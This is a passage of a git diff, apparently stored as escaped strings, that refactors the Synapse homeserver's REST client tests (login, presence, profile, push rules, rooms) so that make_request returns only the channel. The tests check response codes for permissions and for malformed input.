@@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " # we should now be able to make requests with the access token", + "- request, channel = self.make_request(", + "- b\"GET\", TEST_URL, access_token=access_token", + "- )", + "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", + " self.assertEquals(channel.code, 200, channel.result)", + "@@ -209,5 +207,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " # ... and we should be soft-logouted", + "- request, channel = self.make_request(", + "- b\"GET\", TEST_URL, access_token=access_token", + "- )", + "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", + " self.assertEquals(channel.code, 401, channel.result)", + "@@ -225,5 +221,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " self.reactor.advance(3600)", + "- request, channel = self.make_request(", + "- b\"GET\", TEST_URL, access_token=access_token", + "- )", + "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", + " self.assertEquals(channel.code, 401, channel.result)", + "@@ -235,5 +229,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "- b\"GET\", TEST_URL, access_token=access_token", + "- )", + "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", + " self.assertEquals(channel.code, 401, channel.result)", + "@@ -244,3 +236,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " \"\"\"Perform the UI-Auth to delete a device\"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"DELETE\", \"devices/\" + device_id, access_token=access_token", + "@@ -264,3 +256,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"DELETE\",", + "@@ -280,5 +272,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " # we should now be able to make requests with the access token", + "- request, channel = self.make_request(", + "- b\"GET\", TEST_URL, access_token=access_token", + "- )", + "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", + " self.assertEquals(channel.code, 200, channel.result)", + "@@ -289,5 +279,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " # ... and we should be soft-logouted", + "- request, channel = self.make_request(", + "- b\"GET\", TEST_URL, access_token=access_token", + "- )", + "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", + " self.assertEquals(channel.code, 401, channel.result)", + "@@ -297,5 +285,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " # Now try to hard logout this session", + "- request, channel = self.make_request(", + "- b\"POST\", \"/logout\", access_token=access_token", + "- )", + "+ channel = self.make_request(b\"POST\", \"/logout\", access_token=access_token)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -310,5 +296,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " # we should now be able to make requests with the access token", + "- request, channel = self.make_request(", + "- b\"GET\", TEST_URL, access_token=access_token", + "- )", + "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", + " self.assertEquals(channel.code, 200, channel.result)", + "@@ -319,5 +303,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " # ... and we should be soft-logouted", + "- request, channel = self.make_request(", + "- b\"GET\", TEST_URL, access_token=access_token", + "- )", + "+ channel = self.make_request(b\"GET\", TEST_URL, access_token=access_token)", + " self.assertEquals(channel.code, 401, channel.result)", + "@@ -327,5 +309,3 @@ class LoginRestServletTestCase(unittest.HomeserverTestCase):", + " # Now try to hard log out all of the user's sessions", + "- request, channel = self.make_request(", + "- b\"POST\", \"/logout/all\", access_token=access_token", + "- )", + "+ channel = self.make_request(b\"POST\", \"/logout/all\", access_token=access_token)", + " self.assertEquals(channel.result[\"code\"], b\"200\", channel.result)", + "@@ -404,3 +384,3 @@ class CASTestCase(unittest.HomeserverTestCase):", + " # Get Synapse to call the fake CAS and serve the template.", + "- request, channel = self.make_request(\"GET\", cas_ticket_url)", + "+ channel = self.make_request(\"GET\", cas_ticket_url)", + "@@ -448,3 +428,3 @@ class CASTestCase(unittest.HomeserverTestCase):", + " # Get Synapse to call the fake CAS and serve the template.", + "- request, channel = self.make_request(\"GET\", cas_ticket_url)", + "+ channel = self.make_request(\"GET\", cas_ticket_url)", + "@@ -474,3 +454,3 @@ class CASTestCase(unittest.HomeserverTestCase):", + " # Get Synapse to call the fake CAS and serve the template.", + "- request, channel = self.make_request(\"GET\", cas_ticket_url)", + "+ channel = self.make_request(\"GET\", cas_ticket_url)", + "@@ -504,3 +484,3 @@ class JWTTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + " return channel", + "@@ -636,3 +616,3 @@ class JWTTestCase(unittest.HomeserverTestCase):", + " params = json.dumps({\"type\": \"org.matrix.login.jwt\"})", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + " self.assertEqual(channel.result[\"code\"], b\"403\", channel.result)", + "@@ -709,3 +689,3 @@ class JWTPubKeyTestCase(unittest.HomeserverTestCase):", + " )", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + " return channel", + "@@ -737,3 +717,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", + " def register_as_user(self, username):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\",", + "@@ -786,3 +766,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\", LOGIN_URL, params, access_token=self.service.token", + "@@ -801,3 +781,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\", LOGIN_URL, params, access_token=self.service.token", + "@@ -816,3 +796,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\", LOGIN_URL, params, access_token=self.service.token", + "@@ -831,3 +811,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " b\"POST\", LOGIN_URL, params, access_token=self.another_service.token", + "@@ -847,3 +827,3 @@ class AppserviceLoginRestServletTestCase(unittest.HomeserverTestCase):", + " }", + "- request, channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "+ channel = self.make_request(b\"POST\", LOGIN_URL, params)", + "diff --git a/tests/rest/client/v1/test_presence.py b/tests/rest/client/v1/test_presence.py", + "index 11cd8efe2..94a515483 100644", + "--- a/tests/rest/client/v1/test_presence.py", + "+++ b/tests/rest/client/v1/test_presence.py", + "@@ -55,3 +55,3 @@ class PresenceTestCase(unittest.HomeserverTestCase):", + " body = {\"presence\": \"here\", \"status_msg\": \"beep boop\"}", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/presence/%s/status\" % (self.user_id,), body", + "@@ -70,3 +70,3 @@ class PresenceTestCase(unittest.HomeserverTestCase):", + " body = {\"presence\": \"here\", \"status_msg\": \"beep boop\"}", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/presence/%s/status\" % (self.user_id,), body", + "diff --git a/tests/rest/client/v1/test_profile.py b/tests/rest/client/v1/test_profile.py", + "index 2a3b483ea..e59fa70ba 100644", + "--- a/tests/rest/client/v1/test_profile.py", + "+++ b/tests/rest/client/v1/test_profile.py", + "@@ -191,3 +191,3 @@ class ProfileTestCase(unittest.HomeserverTestCase):", + " def test_set_displayname(self):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -204,3 +204,3 @@ class ProfileTestCase(unittest.HomeserverTestCase):", + " \"\"\"Attempts to set a stupid displayname should get a 400\"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -216,5 +216,3 @@ class ProfileTestCase(unittest.HomeserverTestCase):", + " def get_displayname(self):", + "- request, channel = self.make_request(", + "- \"GET\", \"/profile/%s/displayname\" % (self.owner,)", + "- )", + "+ channel = self.make_request(\"GET\", \"/profile/%s/displayname\" % (self.owner,))", + " self.assertEqual(channel.code, 200, channel.result)", + "@@ -280,3 +278,3 @@ class ProfilesRestrictedTestCase(unittest.HomeserverTestCase):", + " def request_profile(self, expected_code, url_suffix=\"\", access_token=None):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", self.profile_url + url_suffix, access_token=access_token", + "@@ -322,3 +320,3 @@ class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):", + " \"\"\"", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/profile/\" + self.requester, access_token=self.requester_tok", + "@@ -327,3 +325,3 @@ class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "@@ -334,3 +332,3 @@ class OwnProfileUnrestrictedTestCase(unittest.HomeserverTestCase):", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\",", + "diff --git a/tests/rest/client/v1/test_push_rule_attrs.py b/tests/rest/client/v1/test_push_rule_attrs.py", + "index 7add5523c..2bc512d75 100644", + "--- a/tests/rest/client/v1/test_push_rule_attrs.py", + "+++ b/tests/rest/client/v1/test_push_rule_attrs.py", + "@@ -47,3 +47,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # PUT a new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", + "@@ -53,3 +53,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # GET enabled for that new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -76,3 +76,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # PUT a new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", + "@@ -82,3 +82,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # disable the rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -91,3 +91,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # check rule disabled", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -98,3 +98,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # DELETE the rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"DELETE\", \"/pushrules/global/override/best.friend\", access_token=token", + "@@ -104,3 +104,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # PUT a new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", + "@@ -110,3 +110,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # GET enabled for that new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -132,3 +132,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # PUT a new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", + "@@ -138,3 +138,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # disable the rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -147,3 +147,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # check rule disabled", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -154,3 +154,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # re-enable the rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -163,3 +163,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # check rule enabled", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -184,3 +184,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # check 404 for never-heard-of rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -191,3 +191,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # PUT a new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", + "@@ -197,3 +197,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # GET enabled for that new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -203,3 +203,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # DELETE the rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"DELETE\", \"/pushrules/global/override/best.friend\", access_token=token", + "@@ -209,3 +209,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # check 404 for deleted rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -223,3 +223,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # check 404 for never-heard-of rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/.m.muahahaha/enabled\", access_token=token", + "@@ -237,3 +237,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # enable & check 404 for never-heard-of rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -254,3 +254,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # enable & check 404 for never-heard-of rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -278,3 +278,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # PUT a new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", + "@@ -284,3 +284,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # GET actions for that new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/actions\", access_token=token", + "@@ -307,3 +307,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # PUT a new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", + "@@ -313,3 +313,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # change the rule actions", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -322,3 +322,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # GET actions for that new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/actions\", access_token=token", + "@@ -343,3 +343,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # check 404 for never-heard-of rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -350,3 +350,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # PUT a new rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/pushrules/global/override/best.friend\", body, access_token=token", + "@@ -356,3 +356,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # DELETE the rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"DELETE\", \"/pushrules/global/override/best.friend\", access_token=token", + "@@ -362,3 +362,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # check 404 for deleted rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/best.friend/enabled\", access_token=token", + "@@ -376,3 +376,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # check 404 for never-heard-of rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/pushrules/global/override/.m.muahahaha/actions\", access_token=token", + "@@ -390,3 +390,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # enable & check 404 for never-heard-of rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -407,3 +407,3 @@ class PushRuleAttributesTestCase(HomeserverTestCase):", + " # enable & check 404 for never-heard-of rule", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "diff --git a/tests/rest/client/v1/test_rooms.py b/tests/rest/client/v1/test_rooms.py", + "index 55d872f0e..6105eac47 100644", + "--- a/tests/rest/client/v1/test_rooms.py", + "+++ b/tests/rest/client/v1/test_rooms.py", + "@@ -86,3 +86,3 @@ class RoomPermissionsTestCase(RoomBase):", + " ).encode(\"ascii\")", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", self.created_rmid_msg_path, b'{\"msgtype\":\"m.text\",\"body\":\"test msg\"}'", + "@@ -92,3 +92,3 @@ class RoomPermissionsTestCase(RoomBase):", + " # set topic for public room", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -114,3 +114,3 @@ class RoomPermissionsTestCase(RoomBase):", + " # send message in uncreated room, expect 403", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -122,3 +122,3 @@ class RoomPermissionsTestCase(RoomBase):", + " # send message in created room not joined (no state), expect 403", + "- request, channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", + "+ channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "@@ -129,3 +129,3 @@ class RoomPermissionsTestCase(RoomBase):", + " )", + "- request, channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", + "+ channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "@@ -134,3 +134,3 @@ class RoomPermissionsTestCase(RoomBase):", + " self.helper.join(room=self.created_rmid, user=self.user_id)", + "- request, channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", + "+ channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -139,3 +139,3 @@ class RoomPermissionsTestCase(RoomBase):", + " self.helper.leave(room=self.created_rmid, user=self.user_id)", + "- request, channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", + "+ channel = self.make_request(\"PUT\", send_msg_path(), msg_content)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "@@ -147,3 +147,3 @@ class RoomPermissionsTestCase(RoomBase):", + " # set/get topic in uncreated room, expect 403", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", \"/rooms/%s/state/m.room.topic\" % self.uncreated_rmid, topic_content", + "@@ -151,3 +151,3 @@ class RoomPermissionsTestCase(RoomBase):", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/rooms/%s/state/m.room.topic\" % self.uncreated_rmid", + "@@ -157,5 +157,5 @@ class RoomPermissionsTestCase(RoomBase):", + " # set/get topic in created PRIVATE room not joined, expect 403", + "- request, channel = self.make_request(\"PUT\", topic_path, topic_content)", + "+ channel = self.make_request(\"PUT\", topic_path, topic_content)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"GET\", topic_path)", + "+ channel = self.make_request(\"GET\", topic_path)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "@@ -166,3 +166,3 @@ class RoomPermissionsTestCase(RoomBase):", + " )", + "- request, channel = self.make_request(\"PUT\", topic_path, topic_content)", + "+ channel = self.make_request(\"PUT\", topic_path, topic_content)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "@@ -170,3 +170,3 @@ class RoomPermissionsTestCase(RoomBase):", + " # get topic in created PRIVATE room and invited, expect 403", + "- request, channel = self.make_request(\"GET\", topic_path)", + "+ channel = self.make_request(\"GET\", topic_path)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "@@ -178,3 +178,3 @@ class RoomPermissionsTestCase(RoomBase):", + " self.helper.auth_user_id = self.rmcreator_id", + "- request, channel = self.make_request(\"PUT\", topic_path, topic_content)", + "+ channel = self.make_request(\"PUT\", topic_path, topic_content)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -182,3 +182,3 @@ class RoomPermissionsTestCase(RoomBase):", + "- request, channel = self.make_request(\"GET\", topic_path)", + "+ channel = self.make_request(\"GET\", topic_path)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -188,5 +188,5 @@ class RoomPermissionsTestCase(RoomBase):", + " self.helper.leave(room=self.created_rmid, user=self.user_id)", + "- request, channel = self.make_request(\"PUT\", topic_path, topic_content)", + "+ channel = self.make_request(\"PUT\", topic_path, topic_content)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"GET\", topic_path)", + "+ channel = self.make_request(\"GET\", topic_path)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -194,3 +194,3 @@ class RoomPermissionsTestCase(RoomBase):", + " # get topic in PUBLIC room, not joined, expect 403", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"GET\", \"/rooms/%s/state/m.room.topic\" % self.created_public_rmid", + "@@ -200,3 +200,3 @@ class RoomPermissionsTestCase(RoomBase):", + " # set topic in PUBLIC room, not joined, expect 403", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\",", + "@@ -210,3 +210,3 @@ class RoomPermissionsTestCase(RoomBase):", + " path = \"/rooms/%s/state/m.room.member/%s\" % (room, member)", + "- request, channel = self.make_request(\"GET\", path)", + "+ channel = self.make_request(\"GET\", path)", + " self.assertEquals(expect_code, channel.code)", + "@@ -382,3 +382,3 @@ class RoomsMemberListTestCase(RoomBase):", + " room_id = self.helper.create_room_as(self.user_id)", + "- request, channel = self.make_request(\"GET\", \"/rooms/%s/members\" % room_id)", + "+ channel = self.make_request(\"GET\", \"/rooms/%s/members\" % room_id)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -386,3 +386,3 @@ class RoomsMemberListTestCase(RoomBase):", + " def test_get_member_list_no_room(self):", + "- request, channel = self.make_request(\"GET\", \"/rooms/roomdoesnotexist/members\")", + "+ channel = self.make_request(\"GET\", \"/rooms/roomdoesnotexist/members\")", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "@@ -391,3 +391,3 @@ class RoomsMemberListTestCase(RoomBase):", + " room_id = self.helper.create_room_as(\"@some_other_guy:red\")", + "- request, channel = self.make_request(\"GET\", \"/rooms/%s/members\" % room_id)", + "+ channel = self.make_request(\"GET\", \"/rooms/%s/members\" % room_id)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "@@ -400,3 +400,3 @@ class RoomsMemberListTestCase(RoomBase):", + " # can't see list if you're just invited.", + "- request, channel = self.make_request(\"GET\", room_path)", + "+ channel = self.make_request(\"GET\", room_path)", + " self.assertEquals(403, channel.code, msg=channel.result[\"body\"])", + "@@ -405,3 +405,3 @@ class RoomsMemberListTestCase(RoomBase):", + " # can see list now joined", + "- request, channel = self.make_request(\"GET\", room_path)", + "+ channel = self.make_request(\"GET\", room_path)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -410,3 +410,3 @@ class RoomsMemberListTestCase(RoomBase):", + " # can see old list once left", + "- request, channel = self.make_request(\"GET\", room_path)", + "+ channel = self.make_request(\"GET\", room_path)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -421,3 +421,3 @@ class RoomsCreateTestCase(RoomBase):", + " # POST with no config keys, expect new room id", + "- request, channel = self.make_request(\"POST\", \"/createRoom\", \"{}\")", + "+ channel = self.make_request(\"POST\", \"/createRoom\", \"{}\")", + "@@ -428,5 +428,3 @@ class RoomsCreateTestCase(RoomBase):", + " # POST with visibility config key, expect new room id", + "- request, channel = self.make_request(", + "- \"POST\", \"/createRoom\", b'{\"visibility\":\"private\"}'", + "- )", + "+ channel = self.make_request(\"POST\", \"/createRoom\", b'{\"visibility\":\"private\"}')", + " self.assertEquals(200, channel.code)", + "@@ -436,5 +434,3 @@ class RoomsCreateTestCase(RoomBase):", + " # POST with custom config keys, expect new room id", + "- request, channel = self.make_request(", + "- \"POST\", \"/createRoom\", b'{\"custom\":\"stuff\"}'", + "- )", + "+ channel = self.make_request(\"POST\", \"/createRoom\", b'{\"custom\":\"stuff\"}')", + " self.assertEquals(200, channel.code)", + "@@ -444,3 +440,3 @@ class RoomsCreateTestCase(RoomBase):", + " # POST with custom + known config keys, expect new room id", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"/createRoom\", b'{\"visibility\":\"private\",\"custom\":\"things\"}'", + "@@ -452,6 +448,6 @@ class RoomsCreateTestCase(RoomBase):", + " # POST with invalid content / paths, expect 400", + "- request, channel = self.make_request(\"POST\", \"/createRoom\", b'{\"visibili')", + "+ channel = self.make_request(\"POST\", \"/createRoom\", b'{\"visibili')", + " self.assertEquals(400, channel.code)", + "- request, channel = self.make_request(\"POST\", \"/createRoom\", b'[\"hello\"]')", + "+ channel = self.make_request(\"POST\", \"/createRoom\", b'[\"hello\"]')", + " self.assertEquals(400, channel.code)", + "@@ -461,3 +457,3 @@ class RoomsCreateTestCase(RoomBase):", + " # Note the trailing space in the MXID here!", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"POST\", \"/createRoom\", b'{\"invite\":[\"@alice:example.com \"]}'", + "@@ -479,12 +475,12 @@ class RoomTopicTestCase(RoomBase):", + " # missing keys or invalid json", + "- request, channel = self.make_request(\"PUT\", self.path, \"{}\")", + "+ channel = self.make_request(\"PUT\", self.path, \"{}\")", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", self.path, '{\"_name\":\"bo\"}')", + "+ channel = self.make_request(\"PUT\", self.path, '{\"_name\":\"bo\"}')", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", self.path, '{\"nao')", + "+ channel = self.make_request(\"PUT\", self.path, '{\"nao')", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(", + "+ channel = self.make_request(", + " \"PUT\", self.path, '[{\"_name\":\"bo\"},{\"_name\":\"jill\"}]'", + "@@ -493,6 +489,6 @@ class RoomTopicTestCase(RoomBase):", + "- request, channel = self.make_request(\"PUT\", self.path, \"text only\")", + "+ channel = self.make_request(\"PUT\", self.path, \"text only\")", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", self.path, \"\")", + "+ channel = self.make_request(\"PUT\", self.path, \"\")", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "@@ -501,3 +497,3 @@ class RoomTopicTestCase(RoomBase):", + " content = '{\"topic\":[\"Topic name\"]}'", + "- request, channel = self.make_request(\"PUT\", self.path, content)", + "+ channel = self.make_request(\"PUT\", self.path, content)", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "@@ -506,3 +502,3 @@ class RoomTopicTestCase(RoomBase):", + " # nothing should be there", + "- request, channel = self.make_request(\"GET\", self.path)", + "+ channel = self.make_request(\"GET\", self.path)", + " self.assertEquals(404, channel.code, msg=channel.result[\"body\"])", + "@@ -511,3 +507,3 @@ class RoomTopicTestCase(RoomBase):", + " content = '{\"topic\":\"Topic name\"}'", + "- request, channel = self.make_request(\"PUT\", self.path, content)", + "+ channel = self.make_request(\"PUT\", self.path, content)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -515,3 +511,3 @@ class RoomTopicTestCase(RoomBase):", + " # valid get", + "- request, channel = self.make_request(\"GET\", self.path)", + "+ channel = self.make_request(\"GET\", self.path)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -522,3 +518,3 @@ class RoomTopicTestCase(RoomBase):", + " content = '{\"topic\":\"Seasons\",\"subtopic\":\"Summer\"}'", + "- request, channel = self.make_request(\"PUT\", self.path, content)", + "+ channel = self.make_request(\"PUT\", self.path, content)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -526,3 +522,3 @@ class RoomTopicTestCase(RoomBase):", + " # valid get", + "- request, channel = self.make_request(\"GET\", self.path)", + "+ channel = self.make_request(\"GET\", self.path)", + " self.assertEquals(200, channel.code, msg=channel.result[\"body\"])", + "@@ -542,20 +538,18 @@ class RoomMemberStateTestCase(RoomBase):", + " # missing keys or invalid json", + "- request, channel = self.make_request(\"PUT\", path, \"{}\")", + "+ channel = self.make_request(\"PUT\", path, \"{}\")", + " self.assertEquals(400, channel.code, msg=channel.result[\"body\"])", + "- request, channel = self.make_request(\"PUT\", path, '{\"_name\":\"bo\"}')", + 